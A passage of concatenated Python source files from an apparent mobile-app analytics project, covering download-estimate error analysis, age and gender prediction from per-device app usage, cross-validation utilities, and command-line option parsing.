g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date', 'range']):
t_under_20 = []
t_under_20.append(float(g[g['sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['loginv_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
t_under_20.append(float(g[g['loginv_scored_sbe_rel_error']<=0.2].shape[0])/g.shape[0])
d = g[['store_id', 'feed_id', 'date', 'actual', 'sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']].describe()
t_under_20_max = np.max(t_under_20)
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s = pd.Series()
s.name = 'best_case'
d = d.append(s)
d['sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[0]
d['scored_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[1]
d['loginv_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[2]
d['loginv_scored_sbe_rel_error']['%_apps_under_20%_error'] = t_under_20[3]
d['sbe_rel_error']['best_case'] = 1 if t_under_20[0]==t_under_20_max else 0
d['scored_sbe_rel_error']['best_case'] = 1 if t_under_20[1]==t_under_20_max else 0
d['loginv_sbe_rel_error']['best_case'] = 1 if t_under_20[2]==t_under_20_max else 0
d['loginv_scored_sbe_rel_error']['best_case'] = 1 if t_under_20[3]==t_under_20_max else 0
if d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['best_case':'best_case'].values.sum() > 1:
#min_error = d[['sbe_rel_error', 'scored_sbe_rel_error', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error']]['mean':'mean'].values.min()
min_error = []
min_error.append(d['sbe_rel_error']['mean'] if d['sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['scored_sbe_rel_error']['mean'] if d['scored_sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['loginv_sbe_rel_error']['mean'] if d['loginv_sbe_rel_error']['best_case']==1 else 1000.0)
min_error.append(d['loginv_scored_sbe_rel_error']['mean'] if d['loginv_scored_sbe_rel_error']['best_case']==1 else 1000.0)
min_error = np.min(min_error)
d['sbe_rel_error']['best_case'] = 1 if (d['sbe_rel_error']['best_case']==1 and d['sbe_rel_error']['mean']==min_error) else 0
d['scored_sbe_rel_error']['best_case'] = 1 if (d['scored_sbe_rel_error']['best_case']==1 and d['scored_sbe_rel_error']['mean']==min_error) else 0
d['loginv_sbe_rel_error']['best_case'] = 1 if (d['loginv_sbe_rel_error']['best_case']== 1 and d['loginv_sbe_rel_error']['mean']==min_error) else 0
d['loginv_scored_sbe_rel_error']['best_case'] = 1 if (d['loginv_scored_sbe_rel_error']['best_case']==1 and d['loginv_scored_sbe_rel_error']['mean']==min_error) else 0
d['store_id'] = n[0]
d['feed_id'] = n[1]
d['category_id'] = n[2]
d['date'] = n[3]
d['range'] = n[4]
describe.append(d)
describe = pd.concat(describe)
return describe
def analyze_category_variation():
pass
def process_file(file_path, country):
df = pd.read_csv(file_path)
#df['store_id'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
#df['feed_id'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
#df['category_id'] = df['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[x])
actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
df['loginv_estimate'] = df['t1e']
df['loginv_estimate'][np.isnan(df['loginv_estimate'])==True] = df['t2e'][np.isnan(df['loginv_estimate'])==True]
df['loginv_estimate'][np.isnan(df['tae'])==False] = df['tae'][np.isnan(df['tae'])==False]
df = df.dropna(subset=['loginv_estimate'])
df['loginv_abs_error'] = (df['loginv_estimate'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
df['category_abs_error'] = (df['Daily.Estimate'] - df['actual']).abs()
df['category_rel_error'] = df['category_abs_error'] / df['actual']
df['score'] = 0.0
df['score'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
df['score2'] = 0.0
df['score2'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['category_rel_error']) + 1.0)
df['score2'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['category_rel_error']) + 1.0)
df['score2'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['category_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['category_rel_error']) + 1.0)))/2.0
categories_df = df[['store_id', 'category_id', 'feed_id', 'date', 'app_id']].drop_duplicates()
scores = df.groupby(['date', 'store_id', 'feed_id', 'category_id']).sum().reset_index()
scores = scores[['date', 'store_id', 'feed_id', 'category_id', 'score', 'score2']]
scores.to_csv('data/category_scores_%s.csv'%country, index=False)
del df['score']
del df['score2']
loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate',
'Daily.Estimate': 'sbe_estimate'}, inplace=True)
loginv_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
del loginv_sbe_df['actual']
loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
loginv_sbe_df['sbe_abs_error'] = (loginv_sbe_df['sbe_estimate'] - loginv_sbe_df['actual']).abs()
loginv_sbe_df['sbe_rel_error'] = loginv_sbe_df['sbe_abs_error'] / loginv_sbe_df['actual']
loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
del loginv_sbe_df['category_id']
loginv_sbe_df = loginv_sbe_df.merge(categories_df, on=['store_id', 'feed_id', 'date', 'app_id'])
#df = df[df['date']==df['date'].min()]
loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(scores, on=['date', 'store_id', 'feed_id', 'category_id'])
loginv_scored_sbe_df['loginv_scored_estimate'] = loginv_scored_sbe_df['loginv_estimate'] * loginv_scored_sbe_df['score']
loginv_scored_sbe_df['scored_estimate'] = loginv_scored_sbe_df['Daily.Estimate'] * loginv_scored_sbe_df['score2']
loginv_scored_sbe_df = loginv_scored_sbe_df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['loginv_scored_estimate'] /= loginv_scored_sbe_df['score']
loginv_scored_sbe_df['scored_estimate'] /= loginv_scored_sbe_df['score2']
loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate': 'loginv_scored_sbe_estimate',
'scored_estimate': 'scored_sbe_estimate'}, inplace=True)
del loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df['scored_sbe_abs_error'] = (loginv_scored_sbe_df['scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
loginv_scored_sbe_df['scored_sbe_rel_error'] = loginv_scored_sbe_df['scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
del loginv_scored_sbe_df['category_id']
loginv_scored_sbe_df = loginv_scored_sbe_df.merge(categories_df, on=['store_id', 'feed_id', 'date', 'app_id'])
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id',
'date',
'feed_id',
'category_id',
'app_id',
'loginv_scored_sbe_estimate',
'loginv_scored_sbe_abs_error',
'loginv_scored_sbe_rel_error',
'scored_sbe_estimate',
'scored_sbe_abs_error',
'scored_sbe_rel_error',
'score',
'score2']]
result = pd.merge(loginv_sbe_df, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'category_id', 'app_id'])
result['store_id'] = result['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
result['feed_id'] = result['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
result['category_id'] = result['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[x])
#result.to_csv('data/scored_result_%s.csv'%country, index=False)
#plot_8020(result[result['date']=='2013-07-23'], 10)
#plot_8020(result[result['date']=='2013-07-23'], 20)
#plot_8020(result[result['date']=='2013-07-23'], 200)
#plot_8020(result[result['date']=='2013-07-23'])
#plot_estimates(result[result['date']=='2013-07-23'])
describe = analyze_results(result)
describe.to_csv('data/error_describe_%s.csv'%country)
del result
del loginv_scored_sbe_df
def main():
start_country = 143441
for root, dirs, files in os.walk(DATA_DIR):
for file in files:
f = file.split('_')
country = f[2]
if file.endswith(".csv") and int(country)>=start_country:
filepath = os.path.join(root, file)
print filepath
process_file(filepath, country)
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/predict.py
import sys
sys.path.append('../')
import pandas as pd
from correction import process
def all_proba_long(usage, model, bundle_ids, classes, modality, timeframe='weekly'):
"""
Determine age or gender probabilities in long format.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:param modality: 'age' or 'gender'
:param time_frame: indicates the timeframe over which demographics are calculated. Can be 'weekly' or 'monthly'
:returns DataFrame with demographic probabilities
"""
if timeframe == 'weekly':
all_probas = pd.concat((weekly_proba(period_data, model, bundle_ids, classes)
for _, period_data in usage.groupby('date', as_index=False)),
axis=0, ignore_index=True)
else:
tmp_data = usage.copy()
tmp_data['year'] = tmp_data.date.apply(lambda x: x.year)
tmp_data['month'] = tmp_data.date.apply(lambda x: x.month)
all_probas = pd.concat((monthly_proba(period_data, model, bundle_ids, classes)
for _, period_data in tmp_data.groupby(['year', 'month'], as_index=False)),
axis=0, ignore_index=True)
return pd.melt(all_probas, id_vars=['device_id', 'date'],
var_name=modality, value_name='proba')
def calculate_crossed_proba(usage, model_age, bundle_ids_age, classes_age,
model_gender, bundle_ids_gender, classes_gender, timeframe='weekly'):
"""
Calculates naively crossed age-gender probabilities.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model_age: model used to predict age
:param bundle_ids_age: list of bundle IDs used by the age assignment model
:param classes_age: list of bucket labels for the age modality
:param model_gender: model used to predict age
:param bundle_ids_gender: list of bundle IDs used by the age assignment model
:param classes_gender: list of bucket labels for the gender modality
:param time_frame: indicates the timeframe over which demographics are calculated. Can be 'weekly' or 'monthly'
:returns DataFrame with crossed demographic probabilities
"""
all_probas_age = all_proba_long(usage, model_age, bundle_ids_age, classes_age,
'age', timeframe=timeframe)
all_probas_gender = all_proba_long(usage, model_gender, bundle_ids_gender, classes_gender,
'gender', timeframe=timeframe)
crossed_probas = pd.merge(all_probas_age, all_probas_gender, on=['device_id', 'date'],
suffixes=['_age', '_gender'])
crossed_probas['proba'] = crossed_probas['proba_age'].multiply(crossed_probas['proba_gender'], axis=0)
crossed_probas['age_gender'] = crossed_probas['age'] + '_' + crossed_probas['gender']
crossed_probas.drop(['age', 'gender', 'proba_age', 'proba_gender'], axis=1, inplace=True)
return crossed_probas
def weekly_proba(usage, model, bundle_ids, classes):
"""
Determine age or gender probabilities on a weekly level.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:returns DataFrame with demographic probabilities
"""
sel_usage = usage[usage.bundle_id.isin(bundle_ids)].copy()
sel_usage['dummy'] = 1
sel_usage['dummy'] = sel_usage.dummy.astype('uint8')
pivoted_usage = pd.pivot_table(sel_usage, values='dummy', index='device_id',
columns='bundle_id', fill_value=0)
# Take into account users that may have been removed
missing_devices = (usage.device_id.ix[~usage.device_id.isin(sel_usage.device_id)]).unique()
pivoted_usage = pd.concat([pivoted_usage, pd.DataFrame(0, index=missing_devices, columns=pivoted_usage.columns)], axis=0)
pivoted_usage.sort_index(inplace=True)
pivoted_usage = process.align_bundle_ids(pivoted_usage, bundle_ids)
predicted_probas = pd.DataFrame(model.predict_proba(pivoted_usage),
index=pivoted_usage.index,
columns=classes)
predicted_probas.index.name = 'device_id'
predicted_probas['date'] = sel_usage['date'].iloc[0]
return predicted_probas.reset_index()
def monthly_proba(usage, model, bundle_ids, classes):
"""
Determine age or gender probabilities on a monthly level by averaging individual weekly predictions.
:param usage: dataframe with usage data. Columns include date, device_id and bundle_id
:param model: model used to predict either age or gender
:param bundle_ids: list of bundle IDs used by the model
:param classes: list of bucket labels
:returns DataFrame with demographic probabilities
"""
# Select only the full weeks in the month of data
month_end = utils.get_end_date(usage.date.iloc[0], 'monthly')
valid_week_ends = utils.get_weekly_end_dates_in_month(month_end)
#Select subset of data that actually has full weeks of data
usage = usage.ix[usage.date.isin(valid_week_ends)]
weekly_probability = pd.concat((weekly_proba(period_data, model, bundle_ids, classes)
for _, period_data in usage.groupby('date', as_index=False)),
axis=0, ignore_index=True)
print weekly_probability.head()
monthly_probability = weekly_probability.groupby('device_id').aggregate('mean').reset_index()
monthly_probability['date'] = month_end
return monthly_probability
<file_sep>/old_investigations/android/run_calculate_sda.py
"""
Calculate SDA daily, and monthly.
"""
from optparse import OptionParser
import os.path
from internal.calculate_sda import calculate_sda_and_save
def parse_options():
parser = OptionParser()
parser.add_option('-d', '--downloads', dest='f_downloads',
help='Required. Downloads data, generated by run_fetch_and_concat.py')
parser.add_option('-u', '--usd', dest='f_usd',
help='Required. USD data, generated by run_fetch_and_concat.py')
parser.add_option('-r', '--ref', dest='f_reference',
help='Optional. Reference file, which contains the App that we cares.')
(opts, args) = parser.parse_args()
if not opts.f_downloads or not opts.f_usd:
parser.print_help()
parser.error("Downloads and USD files are necessary!")
if not ('Downloads' in opts.f_downloads and 'USD' in opts.f_usd):
parser.error('Please specify the right Downloads and USD files.')
return opts
if __name__ == '__main__':
opts = parse_options()
if not os.path.exists("sda"):
os.makedirs('sda')
calculate_sda_and_save(opts.f_downloads, opts.f_usd, opts.f_reference)
print("The files should be already generated in ./sda/")
<file_sep>/audience/demographics-review/lib/cv_functions.py
"""
Module for cross validation of ridge regression method.
Main functions:
- cv_k_fold: run K-Folds cross validation using specified regression
- cv_shuffle_split: run ShuffleSplit cross validation using specified regression
- test_error_alpha: compute error on test set as function of alpha
- train_error_alpha: compute error on training set as function of alpha
- plot
"""
__author__ = 'srhmtonk'
from sklearn import cross_validation
from sklearn.learning_curve import learning_curve
import numpy as np
import matplotlib.pyplot as plt
def cv_k_fold(X, y, estimator_class, test_size=0.1, shuffle=True, coef_threshold=None, **kwargs):
"""
Runs K-Fold cross validation on the provided regression. The number of folds is derived from
size of the test set.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
Class of the estimator to used for regression
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param shuffle: boolean, optional
Determines whether to shuffle the data before splitting (default True).
:param coef_threshold: int, optional
If set the coefficient between -coef_threshold and coef_threshold are
set to zero in the estimation model.
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: tuple of numpy arrays, shape (n_samples)
Target vector and Predicted vector
"""
n_folds = np.round(float(y.size)/(test_size*y.size))
cv_split = cross_validation.KFold(y.size, n_folds=n_folds, shuffle=shuffle)
yhat_test = y.copy()
for train, test in cv_split:
reg = estimator_class(**kwargs)
reg.fit(X[train],y[train])
if coef_threshold is not None:
sel_below = np.abs(reg.coef_)<coef_threshold
reg.coef_[sel_below] = 0
yhat_test[test] = reg.predict(X[test])
return y,yhat_test
def cv_shuffle_split(X, y, estimator_class, test_size=0.1, n_iter=10, coef_threshold=None, **kwargs):
"""
Runs ShuffleSplit cross validation on the provided regression. The split size is based on the
size of the test set.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
Class of the estimator to used for regression
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param n_iter: integer, optional
Number of iterations to run cross validation (default 10).
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: tuple of numpy arrays, shape (n_samples)
Target vector and Predicted vector
"""
cv_split = cross_validation.ShuffleSplit(y.size, n_iter=n_iter, test_size=test_size)
yhat_test = np.zeros(cv_split.n_test*cv_split.n_iter)
y_test = yhat_test.copy()
fill_range = np.arange(cv_split.n_test)
for i, (train, test) in enumerate(cv_split):
reg = estimator_class(**kwargs)
reg.fit(X[train],y[train])
if coef_threshold is not None:
sel_below = np.abs(reg.coef_)<coef_threshold
reg.coef_[sel_below] = 0
fill_idx = fill_range+i*cv_split.n_test
y_test[fill_idx] = y[test]
yhat_test[fill_idx] = reg.predict(X[test])
return y_test,yhat_test
def test_error_alpha(X, y, estimator_class, metric_class, test_size=0.1, shuffle=True, **kwargs):
"""
Returns a cv_k_fold function that only requires alpha as input. Allowing easier
computation of the test error as function of alpha.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples), optional
Target relative to X for regression;
None for unsupervised learning.
:param estimator_class: estimator-class
Class of the estimator to used for regression
:param metric_class: metric-class
Class of metric used for benchmarking the predictions
:param test_size: float, optional
Percentage of samples to be used in test set (default 0.1).
:param shuffle: boolean, optional
Determines whether to shuffle the data before splitting (default True).
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: test function taking only alpha as input parameter
"""
def conf_cv_k_fold(alpha):
y_test,yhat_test = cv_k_fold(X, y, estimator_class, test_size, shuffle, alpha=alpha, **kwargs)
return metric_class(y_test,yhat_test)
return conf_cv_k_fold
def train_error_alpha(X, y, estimator_class, metric_class, **kwargs):
"""
Returns a train regression function that only requires alpha as input. Allowing easier
computation of the train error as function of alpha.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
:param estimator_class: estimator-class
Class of the estimator to used for regression
:param metric_class: metric-class
Class of metric used for benchmarking the predictions
:param kwargs: dictionary, optional
Kwargs to be used as input for the estimator
:return: train function taking only alpha as input parameter
"""
def conf_train_reg(alpha):
y_train = y
reg = estimator_class(alpha=alpha, **kwargs)
reg.fit(X,y_train)
yhat_train = reg.predict(X)
return metric_class(y_train,yhat_train)
return conf_train_reg
#
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""
Generate a simple plot of the test and training learning curve. Taken from
http://scikit-learn.org/stable/_downloads/plot_learning_curve.py
:param estimator: object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
:param title: string
Title for the chart.
:param X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
:param y: array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
:param ylim: tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
:param cv: integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
:param n_jobs: integer, optional
Number of jobs to run in parallel (default 1).
:param train_sizes: array-like, shape (n_sizes), optional
The different train sizes to be used for plotting learning curve
:return: plot
"""
plt.figure(figsize=(10,6))
plt.title(title, fontsize=18)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("$n_{samples}$", fontsize=16)
plt.ylabel("$MAE$", fontsize=16)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring="mean_absolute_error")
train_scores_mean = np.mean(-train_scores, axis=1)
train_scores_std = np.std(-train_scores, axis=1)
test_scores_mean = np.mean(-test_scores, axis=1)
test_scores_std = np.std(-test_scores, axis=1)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', linewidth=2, color="r",
label="Training error")
plt.plot(train_sizes, test_scores_mean, 'o-', linewidth=2, color="g",
label="Cross-validation error")
plt.legend(loc="best")
return plt<file_sep>/product_quality/internal/args.py
from optparse import OptionParser
from datetime import datetime
from utilities_date import make_last_day_of_month
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--stores", dest="stores",
help="Required. A list of the stores that you want to calculate, separated by comma. e.g. 143441,143444,143462,143465,143466")
parser.add_option("-d", "--daterange", dest="daterange",
help="Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-04--2012-05) " \
"or a range of days(e.g. 2012-03-02--2012-07-08)")
parser.add_option("-u", "--unitstypes", dest="units_types",
help="Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD")
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (_refine_options(opts), args)
except Exception:
print(parser.print_help())
def _refine_options(opts):
opts.stores = opts.stores.split(',')
opts.units_types = opts.units_types.split(',')
def convert_month_str(index, s):
"""
index=0: The first date in the daterange.
index=1: The second date in the daterange.
"""
s_split_len = len(s.split('-'))
if s_split_len == 3:
return datetime.strptime(s, '%Y-%m-%d')
elif s_split_len == 2:
d = datetime.strptime(s, '%Y-%m')
if index == 0:
# In this case d would be the first day of the month
# and it's exactly what we want
return d
else:
return make_last_day_of_month(d)
else:
raise Exception("Wrong month format")
months_split = opts.daterange.split('--')
opts.daterange = map(lambda x: convert_month_str(x[0], x[1]),
enumerate(months_split))
# When we have only one date and it's a month,
# that means we want a single month's data.
if (len(opts.daterange) == 1) and (len(months_split[0].split('-')) == 2):
opts.daterange.append(make_last_day_of_month(opts.daterange[0]))
return opts
<file_sep>/aa_au_model/correction/process.py
__author__ = 'hgriffioen'
import data
import pandas as pd
import warnings
from itertools import product
from utils import OrderedLabelEncoder
USAGE_DEVICE_DATA_TYPE = 'uint8'
def filter_data(usage, devices, demographics, platform, start_date, end_date):
"""
Filter usage and demographics data in for a platform, period and active devices.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:return: (DataFrame with device usage, DataFrame with demographics data)
"""
active_devices = filter_devices(devices, platform, start_date, end_date)
demographics_window = filter_device_demographics(demographics, active_devices.device_id)
device_usage_window = get_usage_per_device(usage, active_devices.device_id,
start_date, end_date)
return device_usage_window, demographics_window
def construct_dataset(device_usage, demographics, modality, bundle_ids=None):
"""
Construct a dataset.
:param device_usage: Usage (see filter_data())
:param demographics: Demographics data (see e.g. data.load_adx())
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param bundle_ids: bundle ID's to use for column alignment
:return: (DataFrame with known usage, DataFrame with unknown usage, Series with labels,
LabelEncoder)
"""
labels, label_encoder = construct_labels(demographics, device_usage.index, modality)
known_usage, unknown_usage = split_users(device_usage, labels)
if bundle_ids is None:
bundle_ids = known_usage.columns
known_data = align_bundle_ids(known_usage, bundle_ids)
unknown_data = align_bundle_ids(unknown_usage, bundle_ids)
return known_data, unknown_data, labels, label_encoder
def filter_devices(devices, platform, start_date, end_date):
"""
Filter active devices based on platform and being active in a timeframe.
:param devices: DataFrame with device info
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:return: DataFrame with active devices for a platform in a timeframe
"""
platform_devices = _get_platform_devices(devices, platform)
active_devices = data.load_active_devices(start_date, end_date)
return pd.merge(platform_devices, pd.DataFrame(active_devices), on='device_id')
def _get_platform_devices(devices, platform):
"""
Get load_devices for a platform.
:param devices: DataFrame with all load_devices
:param platform: String ('all', 'iOS', 'iPhone', 'iPad' or 'Android')
:return DataFrame with platform load_devices
"""
if platform == 'all':
is_on_platform = devices.platform.isin(('iOS', 'Android'))
elif platform == 'iOS':
is_on_platform = devices.platform == 'iOS'
elif platform == 'Android':
is_on_platform = devices.platform == 'Android'
elif platform == 'iPhone':
is_on_platform = ((devices.platform == 'iOS') & (devices.device_type == 'Smartphone'))
elif platform == 'iPad':
is_on_platform = ((devices.platform == 'iOS') & (devices.device_type == 'Tablet'))
else:
raise Exception('Unknown platform: %s' % platform)
return devices[is_on_platform]
def filter_device_demographics(df, device_ids, platform=None):
"""
Filter demographics data for a platform and a set of loaded devices.
:param df: DataFrame with demographics data
:param device_ids: List of relevant device ID's
:param platform: String with platform ('iOS', 'iPhone' or 'iPad')
:return DataFrame with filtered demographics data
"""
if platform:
warnings.warn("Parameter platform has been deprecated")
is_device_usage = df.device_id.isin(device_ids)
temp_df = df[is_device_usage].copy()
temp_df.sort(['device_id', 'bundle_id', 'date'], inplace=True)
unique_df = temp_df.drop_duplicates(['device_id', 'bundle_id'], take_last=True)
return unique_df.reset_index(drop=True)
def filter_adx(adx, device_ids, platform=None):
"""
Filter AD-X data for a platform and a set of loaded devices.
:param adx: DataFrame with AD-X data
:param device_ids: List of relevant device ID's
:param platform: String with platform ('iOS', 'iPhone' or 'iPad') (DEPRECATED)
:return DataFrame with filtered AD-X data
"""
return filter_device_demographics(adx, device_ids, platform)
def combine_demographic_sources(demographics, platform=None):
"""
Combine demographic sources and get results per device.
Note: filters devices demographics and only returns demographic columns
common to all sources.
:param demographics: List with demographics (e.g. [adx, questionnaire])
:param platform: String with platform ('iOS', 'iPhone' or 'iPad') (DEPRECATED)
:return: DataFrame with combined demographics
"""
common_columns = demographics[0].columns
source_list = []
for source in demographics:
device_ids = source.device_id.unique()
filtered_source = filter_device_demographics(source, device_ids, platform)
source_list.append(filtered_source)
common_columns = common_columns.intersection(filtered_source.columns)
combined_sources = pd.concat((s[common_columns] for s in source_list),
axis=0, ignore_index=True)
combined_sources.sort(['device_id', 'date'], inplace=True)
combined_sources.drop_duplicates('device_id', take_last=True, inplace=True)
return combined_sources
def get_usage_per_device(usage, device_ids, start_date, end_date):
"""
Get usage per device in a time range.
:param usage: DataFrame with usage
:param device_ids: IDs to get usage for
:param start_date: datetime with start date
:param end_date: datetime with end date
:return DataFrame with usage per device
"""
filtered_usage = _filter_usage(usage, device_ids, start_date, end_date)
filtered_usage['dummy'] = 1
device_usage = pd.pivot_table(filtered_usage, values='dummy', index='device_id', columns='bundle_id',
aggfunc='max', fill_value=0)
return device_usage.astype(USAGE_DEVICE_DATA_TYPE)
def _filter_usage(usage, device_ids, start_date, end_date):
"""
Filter usage by allowed device IDs and period.
:param usage: DataFrame with usage
:param device_ids: List of relevant device ID's
:param start_date: datetime with start date
:param end_date: datetime with end date
:return DataFrame with valid usage
"""
# Cut-off by range.
is_in_valid_range = ((usage.date >= start_date) & (usage.date <= end_date))
usage_in_range = usage[is_in_valid_range]
# Get load_devices that are specified.
is_device_usage = usage_in_range.device_id.isin(device_ids)
# Filter present and specified load_devices.
valid_usage = usage_in_range[is_device_usage]
return valid_usage
def construct_labels(demographics, device_ids, modality, label_encoder=None):
"""
Construct labels for a modality for demograhpics data (with support for cross labels for multi-modality).
:param demographics: Demographics data (see e.g. data.load_adx())
:param device_ids: Device ID's to construct labels for.
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param label_encoder: LabelEncoder used for enconding
:return DataFrame with labels, LabelEncoder used for enconding
"""
has_known_values = demographics[modality.keys()].notnull().all(axis=1)
indexed_demographics = demographics.ix[has_known_values].set_index('device_id').copy()
temp_labels, label_encoder = _construct_modality_labels(indexed_demographics, modality, label_encoder)
is_specified_device = temp_labels.index.intersection(device_ids)
return temp_labels.ix[is_specified_device].copy(), label_encoder
def construct_labels_adx(*args):
"""
Deprecated function, use construct_labels instead.
"""
warnings.warn("This function has been deprecated, use construct_labels() instead.")
return construct_labels(*args)
def _construct_modality_labels(df, modality, label_encoder=None):
"""
Construct labels for a modality (with support for cross labels for multi-modality).
:param df: DataFrame with modality keys as columns and modality value as values
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param label_encoder: LabelEncoder used for enconding
